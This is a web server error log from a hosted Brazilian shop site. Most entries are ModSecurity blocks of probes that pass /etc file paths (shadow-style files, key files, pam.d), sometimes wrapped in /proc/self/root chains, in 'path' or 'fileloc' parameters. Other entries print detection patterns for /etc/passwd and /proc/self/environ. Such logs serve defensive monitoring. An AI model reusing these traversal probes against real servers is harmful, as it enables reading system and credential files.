[Thu Mar 19 18:58:21.342924 2026] [:error] [pid 30077:tid 140411574073088] [client 57.141.18.118:56496] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxffu8EFLIOrSqIpvThQAAAlQ"]
[Thu Mar 19 18:58:21.601158 2026] [:error] [pid 7545:tid 140411666392832] [client 57.141.18.64:56508] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxfX8B84UptSoTJtY59QAAAYk"]
[Thu Mar 19 18:58:24.055806 2026] [:error] [pid 8307:tid 140411649607424] [client 57.141.18.77:56562] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxgL-FhjpZGs9ba8qWGwAAAws"]
[Thu Mar 19 18:58:44.811731 2026] [:error] [pid 20435:tid 140411632822016] [client 57.141.18.36:56978] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxlJJaM1-0uhhUQJNEPwAAAI0"]
[Thu Mar 19 18:58:48.121842 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54802] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:58:51.754932 2026] [:error] [pid 7545:tid 140411641214720] [client 57.141.18.2:57076] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxmX8B84UptSoTJtY5_QAAAYw"]
[Thu Mar 19 18:58:59.181944 2026] [:error] [pid 17653:tid 140411624429312] [client 57.141.18.25:57308] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxo8df6f5d65gmYZSk9wAAAs4"]
[Thu Mar 19 18:58:59.483137 2026] [:error] [pid 14269:tid 140411666392832] [client 57.141.18.21:57312] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxowbLMZ6AikZjR9WHBwAAAAk"]
[Thu Mar 19 18:59:09.057840 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55364] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:59:30.125933 2026] [proxy_fcgi:error] [pid 21219:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55896] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:59:35.173364 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.110:58102] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxx9a6ubjKNq_cu4aAQAAAA0M"]
[Thu Mar 19 18:59:36.088161 2026] [:error] [pid 20435:tid 140411708356352] [client 74.7.243.128:40360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxxyJJaM1-0uhhUQJNETwAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:59:36.417217 2026] [:error] [pid 21563:tid 140411599251200] [client 57.141.18.123:58140] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxyEpm7ZmxKZTM4bZxFwAAA5E"]
[Thu Mar 19 18:59:37.000109 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.16:58162] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxyOoXxyEfFpUF8f85AwAAAUU"]
[Thu Mar 19 18:59:40.136740 2026] [:error] [pid 21563:tid 140411624429312] [client 57.141.18.32:58250] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxzEpm7ZmxKZTM4bZxGQAAA44"]
[Thu Mar 19 18:59:42.065807 2026] [:error] [pid 17653:tid 140411674785536] [client 57.141.18.16:58292] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxzsdf6f5d65gmYZSlCQAAAsg"]
[Thu Mar 19 18:59:42.246657 2026] [:error] [pid 14269:tid 140411666392832] [client 57.141.18.91:58298] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxzgbLMZ6AikZjR9WHGgAAAAk"]
[Thu Mar 19 18:59:50.426887 2026] [mime_magic:error] [pid 8307:tid 140411607643904] (70014)End of file found: [client 57.141.18.95:58500] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 18:59:50.427042 2026] [mime_magic:error] [pid 17653:tid 140411574073088] (70014)End of file found: [client 57.141.18.99:58502] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 18:59:52.122220 2026] [proxy_fcgi:error] [pid 19655:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56486] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:00:13.129790 2026] [proxy_fcgi:error] [pid 8307:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56962] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:00:34.129837 2026] [proxy_fcgi:error] [pid 21219:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:00:44.386160 2026] [core:alert] [pid 17887:tid 140411632822016] [client 57.141.18.103:60024] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 19:00:56.123753 2026] [proxy_fcgi:error] [pid 20435:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58112] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:01:08.874301 2026] [mime_magic:error] [pid 17653:tid 140411624429312] (70014)End of file found: [client 57.141.18.106:60770] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:01:17.145810 2026] [proxy_fcgi:error] [pid 19655:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58660] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:01:18.286973 2026] [mime_magic:error] [pid 15826:tid 140411725141760] (70014)End of file found: [client 57.141.18.104:32788] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:01:36.644729 2026] [mime_magic:error] [pid 15826:tid 140411649607424] (70014)End of file found: [client 74.7.241.31:54736] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/opt/puppetlabs/puppet/lib/ruby
[Thu Mar 19 19:01:39.127662 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59252] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:01:41.594410 2026] [core:alert] [pid 26799:tid 140411649607424] [client 57.141.18.11:33446] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 19:01:45.999204 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:49586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxySfqxLDW4GITHUkSTtQAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:01:53.324461 2026] [:error] [pid 8307:tid 140411649607424] [client 74.7.243.128:48216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxyUb-FhjpZGs9ba8qWbgAAAws"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:01:55.828956 2026] [core:alert] [pid 15826:tid 140411708356352] [client 57.141.18.30:33790] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 19:02:00.509809 2026] [proxy_fcgi:error] [pid 5816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:02:17.567772 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:46900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxyafqxLDW4GITHUkSTygAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 19:02:23.131228 2026] [proxy_fcgi:error] [pid 7235:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:02:45.135338 2026] [proxy_fcgi:error] [pid 7893:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60620] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:02:49.330824 2026] [core:alert] [pid 30077:tid 140411557287680] [client 216.73.216.191:52566] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 19:03:05.918711 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.244.43:46304] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxymBCii7xarUs8iHYWpAAAAgM"]
[Thu Mar 19 19:03:09.117813 2026] [proxy_fcgi:error] [pid 7235:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:32870] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:03:38.129780 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33466] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:03:52.901474 2026] [:error] [pid 21563:tid 140411599251200] [client 57.141.18.64:36932] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxyyEpm7ZmxKZTM4bZxgwAAA5E"]
[Thu Mar 19 19:04:16.288413 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.91:37556] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy4BCii7xarUs8iHYWuwAAAgM"]
[Thu Mar 19 19:04:18.073819 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34330] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:04:22.962644 2026] [:error] [pid 19655:tid 140411590858496] [client 57.141.18.60:37466] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy5k1ujooLWdUDGy4AmAAAAFI"]
[Thu Mar 19 19:04:28.275492 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.73:37904] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy7Na6ubjKNq_cu4aAwQAAA0w"]
[Thu Mar 19 19:04:28.783698 2026] [:error] [pid 7545:tid 140411582465792] [client 57.141.18.113:37916] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy7H8B84UptSoTJtY6iwAAAZM"]
